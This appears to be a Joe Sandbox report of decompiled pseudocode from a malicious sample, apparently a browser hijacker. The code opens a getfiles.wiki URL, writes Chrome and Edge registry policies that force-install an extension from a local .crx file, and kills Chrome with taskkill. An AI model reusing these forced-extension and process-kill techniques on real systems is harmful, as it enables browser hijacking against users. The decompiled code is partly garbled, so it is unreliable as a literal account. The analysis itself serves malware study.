Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateProcess_memset
String ID: D$c:\windows\system32\taskkill.exe
API String ID: 1177741608-2254422676
Opcode ID: 74b14b02b62416469ceab4c7b470971282792ef4d0c141f0081e53588bfd1943
Instruction ID: 7710bbbdb33104f559697e82d13988023b9f500867b7ded415fb49216fa4f8a1
Opcode Fuzzy Hash: 74b14b02b62416469ceab4c7b470971282792ef4d0c141f0081e53588bfd1943
Instruction Fuzzy Hash: D031E3B5D04349DBFB63DBE89804BAD7FB4AB14310F04C699E690AE5C6DA74D005CB22

Uniqueness

Uniqueness Score: -1.00%

Function 01002CED Relevance: 9.1, APIs: 6, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E01002CED(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				char _t41;
				void* _t44;

				_t41 = _a12;
				_v8 = 0;
				_t48 = _t41;
				if(_t41 != 0) {
					_push(__esi);
					E0100337A();
					_t44 = E010041EA(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E01004117(0, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E010040F4(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E01003568(0, __edx, _t41, __eflags) + 0x6c)));
						_push(_t44);
						E01003408(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						__eflags = _t25;
						if(_t25 == 0) {
							_t25 =  &_a12;
						}
						_t20 = CreateThread(_a4, _a8, E01002C6A, _t44, _a20, _t25); // executed
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E010040CE(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E010043BB(__edx, _t41, __esi);
					_t20 = 0;
				}
				return _t20;
			}

0x01002cf5
0x01002cfa
0x01002cfd
0x01002cff
0x01002d1d
0x01002d1e
0x01002d2f
0x01002d33
0x01002d35
0x01002d81
0x01002d81
0x01002d82
0x01002d88
0x01002d8b
0x01002d90
0x01002d95
0x01002d96
0x01002d96
0x01002d37
0x01002d3c
0x01002d3f
0x01002d40
0x01002d48
0x01002d4c
0x01002d4f
0x01002d54
0x01002d57
0x01002d59
0x01002d5b
0x01002d5b
0x01002d6e
0x01002d74
0x01002d76
0x01002d7e
0x00000000
0x01002d7e
0x01002d76
0x01002d01
0x01002d01
0x01002d06
0x01002d07
0x01002d08
0x01002d09
0x01002d0a
0x01002d0b
0x01002d11
0x01002d19
0x01002d19
0x01002d9c

APIs

___set_flsgetvalue.LIBCMT ref: 01002D1E
__calloc_crt.LIBCMT ref: 01002D2A
__getptd.LIBCMT ref: 01002D37
CreateThread.KERNELBASE(?,?,01002C6A,00000000,?,?), ref: 01002D6E
GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 01002D78
__dosmaperr.LIBCMT ref: 01002D90

Part of subcall function 010040CE: __getptd_noexit.LIBCMT ref: 010040CE

Part of subcall function 010043BB: __decode_pointer.LIBCMT ref: 010043C6

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
String ID:
API String ID: 1803633139-0
Opcode ID: e496377d8e43db31dc8b80ad3b678ccb303e4a2ebe39902c10e60fc053edf1f1
Instruction ID: 90b992d60a816d0540b239417abf5cb62da5be642cc7500543ed5617e4ada9f3
Opcode Fuzzy Hash: e496377d8e43db31dc8b80ad3b678ccb303e4a2ebe39902c10e60fc053edf1f1
Instruction Fuzzy Hash: 3E11B27250020AAFFB23BFA8DC858DE7BE5FF10260F10406AF685E61D0DB719A41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0100175A(void* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _t453;
				void* _t565;
				void* _t566;
				void* _t568;
				void* _t584;

				_t566 = __esi;
				_t565 = __edi;
				_t453 = __ebx;
				_t584 = __eax + _t568;
			}

0x0100175a
0x0100175a
0x0100175a
0x0100175a

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,C:\Program Files,00000026,00000000), ref: 01001767

Strings

%s\Google\Chrome\Application\chrome.exe, xrefs: 010017DA
C:\Program Files, xrefs: 01001760, 01001772

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: FolderPathSpecial
String ID: %s\Google\Chrome\Application\chrome.exe$C:\Program Files
API String ID: 994120019-946050236
Opcode ID: bc115ef6e721e9d0767a3c7e69ee7e8e3dec9b01b87d58924e142b67e280f49e
Instruction ID: bd1d50518dd869436248df4dd4ab4daa1da05a6908f8ed8e7edd735257cbfaf4
Opcode Fuzzy Hash: bc115ef6e721e9d0767a3c7e69ee7e8e3dec9b01b87d58924e142b67e280f49e
Instruction Fuzzy Hash: 991181F1A046189BEB77DF69DC056ACB3B8FB14324F0007D8E5AD661C1D6798B85CB04

Uniqueness

Uniqueness Score: -1.00%

Function 01001A1A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E01001A1A(void* __eax, signed char __ebx, intOrPtr* __edi, intOrPtr __esi, void* __eflags) {
				void* _t249;
				intOrPtr _t250;
				long _t252;
				void* _t253;
				int _t254;
				intOrPtr _t255;
				void* _t265;
				signed int _t269;
				short _t272;
				signed int _t277;
				short _t279;
				long _t286;
				void* _t287;
				intOrPtr _t311;
				short _t340;
				short _t343;
				void* _t350;
				signed char _t368;
				void* _t376;
				void* _t377;
				intOrPtr _t381;
				void* _t382;
				void* _t390;
				intOrPtr _t422;
				void* _t429;
				signed int _t431;
				void* _t432;
				void* _t433;
				WCHAR* _t435;
				void* _t452;
				intOrPtr* _t467;
				intOrPtr _t468;
				signed int _t470;
				void* _t473;
				void* _t474;
				void* _t475;
				void* _t476;
				void* _t477;
				void* _t479;
				void* _t481;
				void* _t485;
				void* _t486;
				short _t488;
				void* _t489;
				int _t493;

				_t485 = __eflags;
				_t468 = __esi;
				_t467 = __edi;
				_t368 = __ebx;
				 *((intOrPtr*)(__eax - 1))();
				asm("adc eax, 0x101d274");
				asm("clc");
				if(__eflags < 0) {
					0x80039912();
				}
				if(_t485 > 0 && _t485 <= 0) {
					0x16a1f9a();
				}
				_t369 = _t470 - 0x420;
				ShellExecuteW(0, L"open", _t470 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
				asm("clc");
				if(_t485 < 0) {
					0x1c588339();
				}
				Sleep(0x1b58); // executed
				if(_t485 != 0 && _t485 == 0) {
				}
				_t422 =  *0x101d264; // 0x145f9e0
				E01002B10(_t369, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t422);
				_t474 = _t473 + 0xc;
				if(_t485 != 0 && _t485 == 0) {
				}
				_t249 = FindFirstFileW(_t470 - 0x210, _t470 - 0xa88); // executed
				 *(_t470 - 0x332c) = _t249;
				if(_t485 != 0 && _t485 == 0) {
				}
				 *(_t470 - 0x353c) = 0;
				_t250 =  *0x101d264; // 0x145f9e0
				_t371 = _t470 - 0x210;
				E01002B10(_t470 - 0x210, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t250);
				_t475 = _t474 + 0xc;
				_t252 = GetFileAttributesW(_t470 - 0x210); // executed
				_t486 = _t252 - 0xffffffff;
				if(_t486 == 0) {
					if(_t486 != 0 && _t486 == 0) {
						0xffc8();
					}
					 *((intOrPtr*)(_t470 - 0x3764)) = L"Default";
					 *(_t470 - 0x3768) = _t470 +  *(_t470 - 0x353c) * 0x208 - 0x3328;
					 *(_t470 - 0x376c) =  *(_t470 - 0x3768);
					 *(_t470 - 0x353c) =  *(_t470 - 0x353c) + 1;
					 *(_t470 - 0x3770) =  *(_t470 - 0x376c);
					do {
						 *((short*)(_t470 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3764))));
						 *( *(_t470 - 0x376c)) =  *((intOrPtr*)(_t470 - 0x3772));
						 *((intOrPtr*)(_t470 - 0x3764)) =  *((intOrPtr*)(_t470 - 0x3764)) + 2;
						_t371 =  &( *(_t470 - 0x376c)->dwFileAttributes);
						 *(_t470 - 0x376c) =  &( *(_t470 - 0x376c)->dwFileAttributes);
						_t488 =  *((short*)(_t470 - 0x3772));
					} while (_t488 != 0);
					if(_t488 != 0 && _t488 == 0) {
						0x9a02();
					}
				}
				if(_t488 != 0 && _t488 == 0) {
					0xe801();
				}
				do {
					if(_t488 != 0 && _t488 == 0) {
						0x1fa2bec();
					}
					_t253 = E01002B60(_t470 - 0xa5c, L"Profile ");
					_t475 = _t475 + 8;
					_t489 = _t253;
					if(_t489 != 0) {
						asm("clc");
						if(_t489 < 0) {
							0xa585a98c();
						}
						_t350 = _t470 - 0xa5c;
						 *((intOrPtr*)(_t350 - 0x75))();
						E01002B10(_t371, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t371);
						_t475 = _t475 + 0x10;
						if(GetFileAttributesW(_t470 - 0x210) == 0xffffffff) {
							 *((intOrPtr*)(_t470 - 0x3778)) = _t470 - 0xa5c;
							 *((intOrPtr*)(_t470 - 0x377c)) = _t470 +  *(_t470 - 0x353c) * 0x208 - 0x3328;
							 *((intOrPtr*)(_t470 - 0x3780)) =  *((intOrPtr*)(_t470 - 0x377c));
							 *(_t470 - 0x353c) =  *(_t470 - 0x353c) + 1;
							 *((intOrPtr*)(_t470 - 0x3784)) =  *((intOrPtr*)(_t470 - 0x3780));
							do {
								 *((short*)(_t470 - 0x3786)) =  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3778))));
								 *((short*)( *((intOrPtr*)(_t470 - 0x3780)))) =  *((intOrPtr*)(_t470 - 0x3786));
								 *((intOrPtr*)(_t470 - 0x3778)) =  *((intOrPtr*)(_t470 - 0x3778)) + 2;
								 *((intOrPtr*)(_t470 - 0x3780)) =  *((intOrPtr*)(_t470 - 0x3780)) + 2;
							} while ( *((short*)(_t470 - 0x3786)) != 0);
						}
					}
					_t371 = _t470 - 0xa88;
					_t426 =  *(_t470 - 0x332c);
					_t254 = FindNextFileW( *(_t470 - 0x332c), _t470 - 0xa88); // executed
					_t493 = _t254;
				} while (_t493 != 0);
				if(_t493 != 0 && _t493 == 0) {
					0xffca();
				}
				if( *(_t470 - 0x353c) != 0) {
					if(__eflags > 0 && __eflags <= 0) {
						0x2d28149();
					}
					_t255 =  *0x101d264; // 0x145f9e0
					_t376 = _t470 - 0x3538;
					E01002B10(_t376, _t376, L"%s\\ServiceApp\\apps-helper", _t255);
					_t476 = _t475 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xc995aaae();
					}
					E01002B10(_t376, _t470 - 0x3748, L"%s\\edge.crx", _t470 - 0x3538);
					_t477 = _t476 + 0xc;
					asm("clc");
					if(__eflags < 0) {
						0xfc8085ce();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L55;
						__eflags = _t376 + _t470;
					}
					_t377 = _t470 - 0x3748;
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t377); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb995ab2b();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"path", _t470 - 0x3748); // executed
					if(__eflags != 0 && __eflags == 0) {
						0x100();
					}
					E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\\ecffbknobglofafinobbcmaionnihcma", L"version", L"1.0"); // executed
					asm("clc");
					if(__eflags < 0) {
						0xdd85ab6a();
					}
					_t265 = E01001330(_t368, _t468, L" /IM chrome.exe", _t470 - 0x424); // executed
					if(__eflags != 0) {
						if (__eflags != 0) goto L69;
						__eflags = _t265 + _t470;
					}
					Sleep(0x2bc); // executed
					asm("clc");
					if(__eflags < 0) {
						0xb585e590();
					}
					 *(_t470 - 0x374c) = 0;
					while(1) {
						_t429 =  *(_t470 - 0x374c);
						__eflags = _t429 -  *(_t470 - 0x353c);
						if(__eflags >= 0) {
							break;
						}
						if (__eflags == 0) goto L78;
						__eflags = _t468 +  *((intOrPtr*)(_t470 + 1));
					}
					if(__eflags > 0 && __eflags <= 0) {
						0xc9b0a3fd();
					}
					 *(_t470 - 0x3750) = 0;
					__eflags =  *(_t470 - 0x3750) -  *(_t470 - 0x353c);
					if(__eflags >= 0) {
						Sleep(0x1388); // executed
						if(__eflags != 0 && __eflags == 0) {
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						asm("clc");
						if(__eflags < 0) {
							0x27887eb();
						}
						E01001270(__eflags, 0x80000002, L"SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "6", L"ecffbknobglofafinobbcmaionnihcma"); // executed
						Sleep(0x1388); // executed
						_t426 = _t470 - 0x424;
						E01001330(_t368, _t468, L" /F /IM chrome.exe /T", _t470 - 0x424); // executed
						if(__eflags != 0 && __eflags == 0) {
							0xfc4d();
						}
						_t269 = 0;
						__eflags = 0;
						goto L107;
					} else {
						if(__eflags != 0 && __eflags == 0) {
							0xc9b0b3ef();
						}
						_t431 =  *(_t470 - 0x3750) * 0x208;
						__eflags = _t431;
						_push(_t470 + _t431 - 0x3328);
						_t381 =  *0x101d264; // 0x145f9e0
						_t432 = _t470 - 0x630;
						_t272 = E01002B10(_t381, _t432, L"%s\\Google\\Chrome\\User Data\\%s\\Extensions\\ecffbknobglofafinobbcmaionnihcma\\1.0_0\\src\\jquery-3.5.1.min.js", _t381);
						_t479 = _t477 + 0x10;
						if(__eflags != 0 && __eflags == 0) {
						}
						while(1) {
							_t368 = _t368 >> 0xff;
							_t102 = _t381 + 2; // 0x2e0000
							__eflags = _t272 - 1 -  *_t102;
							if(_t272 - 1 !=  *_t102) {
								goto L117;
							}
							 *(_t470 - 0x3fbc) =  *(_t470 - 0x3fbc) + 4;
							 *((intOrPtr*)(_t470 - 0x3fb8)) =  *((intOrPtr*)(_t470 - 0x3fb8)) + 4;
							__eflags =  *((short*)(_t470 - 0x3fc0));
							if( *((short*)(_t470 - 0x3fc0)) != 0) {
								L111:
								_t432 =  *(_t470 - 0x3fbc);
								_t279 =  *_t432;
								 *((short*)(_t470 - 0x3fbe)) = _t279;
								__eflags = _t279 -  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fb8))));
								if(_t279 !=  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fb8))))) {
									goto L117;
								} else {
									__eflags =  *((short*)(_t470 - 0x3fbe));
									if( *((short*)(_t470 - 0x3fbe)) == 0) {
										goto L116;
									} else {
										_t432 =  *(_t470 - 0x3fbc);
										_t272 =  *((intOrPtr*)(_t432 + 2));
										 *((short*)(_t470 - 0x3fc0)) = _t272;
										_t381 =  *((intOrPtr*)(_t470 - 0x3fb8));
										continue;
									}
								}
							} else {
								L116:
								 *(_t470 - 0x3fc4) = 0;
							}
							L118:
							 *(_t470 - 0x3fc8) =  *(_t470 - 0x3fc4);
							__eflags =  *(_t470 - 0x3fc8);
							if( *(_t470 - 0x3fc8) != 0) {
								 *((intOrPtr*)(_t470 - 0x3fcc)) = L"..";
								 *(_t470 - 0x3fd0) = _t470 - 0x3d74;
								while(1) {
									_t452 =  *(_t470 - 0x3fd0);
									_t340 =  *_t452;
									 *((short*)(_t470 - 0x3fd2)) = _t340;
									__eflags = _t340 -  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fcc))));
									if(_t340 !=  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3fcc))))) {
										break;
									}
									__eflags =  *((short*)(_t470 - 0x3fd2));
									if( *((short*)(_t470 - 0x3fd2)) == 0) {
										L124:
										 *(_t470 - 0x3fd8) = 0;
									} else {
										_t452 =  *(_t470 - 0x3fd0);
										_t343 =  *((intOrPtr*)(_t452 + 2));
										 *((short*)(_t470 - 0x3fd4)) = _t343;
										_t124 =  *((intOrPtr*)(_t470 - 0x3fcc)) + 2; // 0x2e
										__eflags = _t343 -  *_t124;
										if(_t343 !=  *_t124) {
											break;
										} else {
											 *(_t470 - 0x3fd0) =  *(_t470 - 0x3fd0) + 4;
											 *((intOrPtr*)(_t470 - 0x3fcc)) =  *((intOrPtr*)(_t470 - 0x3fcc)) + 4;
											__eflags =  *((short*)(_t470 - 0x3fd4));
											if( *((short*)(_t470 - 0x3fd4)) != 0) {
												continue;
											} else {
												goto L124;
											}
										}
									}
									L126:
									 *(_t470 - 0x3fdc) =  *(_t470 - 0x3fd8);
									__eflags =  *(_t470 - 0x3fdc);
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xffc2();
										}
										E01002B40(_t470 - 0x3938, _t470 - 0x3d74);
										_t479 = _t479 + 8;
										if(__eflags != 0 && __eflags == 0) {
										}
									}
									while(1) {
										L133:
										_t382 =  *(_t470 - 0x3fac);
										_t277 = FindNextFileW(_t382, _t470 - 0x3da0);
										__eflags = _t277;
										if(__eflags == 0) {
											break;
										}
										__eflags =  *(_t470 - 0x3da0) - 0x10;
										 *_t277();
										if(__eflags == 0) {
											 *((intOrPtr*)(_t470 - 0x3fb8)) = ".";
											 *(_t470 - 0x3fbc) = _t470 - 0x3d74;
											goto L111;
										}
									}
									_t433 =  *(_t470 - 0x3fac);
									FindClose(_t433);
									if(__eflags != 0 && __eflags == 0) {
										0x8589();
									}
									__eflags = 0;
									 *(_t470 - 0x3730) = 0;
									_push(0x206);
									 *_t433 = _t382 +  *_t433;
									_push(_t470 - 0x372e);
									E01007BE0(_t467);
									_push(_t470 - 0x3938);
									_t390 = _t470 - 0x3730;
									E01002B10(_t390, _t390, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t470 - 0x420);
									_t481 = _t479 + 0x1c;
									_t435 = _t470 - 0x3730;
									_t286 = GetFileAttributesW(_t435); // executed
									__eflags = _t286 - 0xffffffff;
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xfeeca783();
										}
										_t287 = _t470 - 0x214;
										 *((intOrPtr*)(_t287 + 0x68))();
										asm("aas");
										 *_t467 =  *_t467 + _t390;
										 *_t435 =  *_t435 + _t390;
										__eflags =  *_t435;
										 *(_t470 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
										if(__eflags != 0 && __eflags == 0) {
										}
										__eflags =  *(_t470 - 0x3b50);
										_t150 = _t470 + 0x2f;
										 *_t150 = _t435 +  *(_t470 + 0x2f);
										__eflags =  *_t150;
									} else {
										asm("clc");
										if(__eflags < 0) {
											0xeac055d1();
										}
										_t311 = 0;
									}
									__eflags =  *(_t470 - 4) ^ _t470;
									return E01002B7C(_t311, _t368,  *(_t470 - 4) ^ _t470, _t440, _t467, _t468);
									goto L290;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								 *(_t470 - 0x3fd8) = _t452;
								goto L126;
							}
							goto L133;
							L117:
							asm("sbb edx, edx");
							asm("sbb edx, 0xffffffff");
							 *(_t470 - 0x3fc4) = _t432;
							goto L118;
						}
					}
				} else {
					_t269 = 0;
					L107:
					return E01002B7C(_t269, _t368,  *(_t470 - 4) ^ _t470, _t426, _t467, _t468);
				}
				L290:
			}

0x01001a1a
0x01001a1a
0x01001a1a
0x01001a1a
0x01001a1a
0x01001a1d
0x01001a22
0x01001a23
0x01001a25
0x01001a25
0x01001a27
0x01001a2b
0x01001a2b
0x01001a35
0x01001a43
0x01001a49
0x01001a4a
0x01001a4c
0x01001a4c
0x01001a53
0x01001a59
0x01001a59
0x01001a5e
0x01001a71
0x01001a76
0x01001a79
0x01001a79
0x01001a8c
0x01001a92
0x01001a98
0x01001a98
0x01001a9d
0x01001aa7
0x01001ab2
0x01001ab9
0x01001abe
0x01001ac8
0x01001ace
0x01001ad1
0x01001ad7
0x01001adb
0x01001adb
0x01001add
0x01001afa
0x01001b06
0x01001b15
0x01001b21
0x01001b27
0x01001b30
0x01001b44
0x01001b50
0x01001b5c
0x01001b5f
0x01001b65
0x01001b65
0x01001b6f
0x01001b73
0x01001b73
0x01001b6f
0x01001b75
0x01001b79
0x01001b79
0x01001b7b
0x01001b7b
0x01001b7f
0x01001b7f
0x01001b8c
0x01001b91
0x01001b94
0x01001b96
0x01001b9c
0x01001b9d
0x01001b9f
0x01001b9f
0x01001ba1
0x01001ba6
0x01001bbb
0x01001bc0
0x01001bd3
0x01001bdf
0x01001bf8
0x01001c04
0x01001c13
0x01001c1f
0x01001c25
0x01001c2e
0x01001c42
0x01001c4e
0x01001c5d
0x01001c63
0x01001c25
0x01001bd3
0x01001c6d
0x01001c74
0x01001c7b
0x01001c81
0x01001c81
0x01001c89
0x01001c8d
0x01001c8d
0x01001c96
0x01001c9f
0x01001ca3
0x01001ca3
0x01001ca4
0x01001caf
0x01001cb6
0x01001cbb
0x01001cbe
0x01001cbf
0x01001cc1
0x01001cc1
0x01001cd6
0x01001cdb
0x01001cde
0x01001cdf
0x01001ce1
0x01001ce1
0x01001cf7
0x01001cfc
0x01001cfe
0x01001cff
0x01001cff
0x01001d01
0x01001d17
0x01001d1c
0x01001d20
0x01001d20
0x01001d36
0x01001d3b
0x01001d3c
0x01001d3e
0x01001d3e
0x01001d56
0x01001d5b
0x01001d5f
0x01001d5f
0x01001d75
0x01001d7a
0x01001d7b
0x01001d7d
0x01001d7d
0x01001d8b
0x01001d90
0x01001d92
0x01001d93
0x01001d93
0x01001d9a
0x01001da0
0x01001da1
0x01001da3
0x01001da3
0x01001da5
0x01001dc0
0x01001dc0
0x01001dc6
0x01001dcc
0x00000000
0x00000000
0x01001dce
0x01001dcf
0x01001dcf
0x01001e2d
0x01001e31
0x01001e31
0x01001e32
0x01001e53
0x01001e59
0x01001ed7
0x01001edd
0x01001edd
0x01001ef6
0x01001efb
0x01001efc
0x01001efe
0x01001efe
0x01001f14
0x01001f1e
0x01001f24
0x01001f30
0x01001f35
0x01001f39
0x01001f39
0x01001f3b
0x01001f3b
0x00000000
0x01001e5b
0x01001e5b
0x01001e5f
0x01001e5f
0x01001e66
0x01001e66
0x01001e73
0x01001e74
0x01001e80
0x01001e87
0x01001e8c
0x01001e8f
0x01001e8f
0x01002050
0x01002051
0x01002054
0x01002054
0x01002058
0x00000000
0x00000000
0x0100205a
0x01002061
0x01002068
0x01002070
0x01002018
0x01002018
0x0100201e
0x01002021
0x0100202e
0x01002031
0x00000000
0x01002033
0x01002033
0x0100203b
0x00000000
0x0100203d
0x0100203d
0x01002043
0x01002047
0x0100204e
0x00000000
0x0100204e
0x0100203b
0x01002072
0x01002072
0x01002072
0x01002072
0x01002089
0x0100208f
0x01002095
0x0100209c
0x010020a2
0x010020b2
0x010020b8
0x010020b8
0x010020be
0x010020c1
0x010020ce
0x010020d1
0x00000000
0x00000000
0x010020d3
0x010020db
0x01002112
0x01002112
0x010020dd
0x010020dd
0x010020e3
0x010020e7
0x010020f4
0x010020f4
0x010020f8
0x00000000
0x010020fa
0x010020fa
0x01002101
0x01002108
0x01002110
0x00000000
0x00000000
0x00000000
0x00000000
0x01002110
0x010020f8
0x01002129
0x0100212f
0x01002135
0x0100213c
0x0100213e
0x01002142
0x01002142
0x01002152
0x01002157
0x0100215a
0x0100215a
0x0100215a
0x0100215f
0x0100215f
0x01002166
0x0100216d
0x01002173
0x01002175
0x00000000
0x00000000
0x01001ff5
0x01001ffa
0x01001ffc
0x01002002
0x01002012
0x00000000
0x01002012
0x01001ffc
0x0100217b
0x01002182
0x01002188
0x0100218c
0x0100218c
0x0100218e
0x01002190
0x01002197
0x0100219b
0x010021a4
0x010021a5
0x010021b3
0x010021c0
0x010021c7
0x010021cc
0x010021cf
0x010021d6
0x010021dc
0x010021df
0x010021ed
0x010021f1
0x010021f1
0x010021f2
0x010021f7
0x010021fa
0x010021fb
0x010021fd
0x010021fd
0x01002210
0x01002216
0x01002216
0x0100221b
0x01002221
0x01002221
0x01002221
0x010021e1
0x010021e1
0x010021e2
0x010021e4
0x010021e4
0x010021e6
0x010021e6
0x01002931
0x0100293b
0x00000000
0x0100293b
0x0100211e
0x01002120
0x01002123
0x00000000
0x01002123
0x00000000
0x0100207e
0x0100207e
0x01002080
0x01002083
0x00000000
0x01002083
0x01002050
0x01001c98
0x01001c98
0x01001f3d
0x01001f4a
0x01001f4a
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,open,?, https://getfiles.wiki/welcome.php,00000000,00000005), ref: 01001A43
Sleep.KERNELBASE(00001B58), ref: 01001A53

Strings

open, xrefs: 01001A3C
https://getfiles.wiki/welcome.php, xrefs: 01001A30

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ExecuteShellSleep
String ID: https://getfiles.wiki/welcome.php$open
API String ID: 4194306370-4115781834
Opcode ID: 82d067c76a3103ea2cff88c41af12e92ee3c1257c928200fcdf596e1e7d50217
Instruction ID: 125e6907833832c6737bf5b3a3a5f1616b06ecc2605df75889375059affa2ba6
Opcode Fuzzy Hash: 82d067c76a3103ea2cff88c41af12e92ee3c1257c928200fcdf596e1e7d50217
Instruction Fuzzy Hash: 75E08671B48211ABF7775BE59C0EBA87A90BB23755F0903C4F2D1990C3EDB9D2488B25

Uniqueness

Uniqueness Score: -1.00%

Function 01002BEC Relevance: 6.0, APIs: 4, Instructions: 19
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01002BEC(long _a4) {
				void* _t6;
				void* _t9;
				void* _t10;

				_t11 =  *0x101e420;
				if( *0x101e420 != 0 && E01003940(_t11, 0x101e420) != 0) {
					 *0x101e420();
				}
				if(E010034EF(_t6) != 0) {
					E010036B1(_t6, _t9, _t10, _t2);
				}
				ExitThread(_a4);
			}

0x01002bf1
0x01002bf8
0x01002c09
0x01002c09
0x01002c16
0x01002c19
0x01002c1e
0x01002c22

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 01002BFF

Part of subcall function 01003940: __FindPESection.LIBCMT ref: 0100399B

__getptd_noexit.LIBCMT ref: 01002C0F
__freeptd.LIBCMT ref: 01002C19
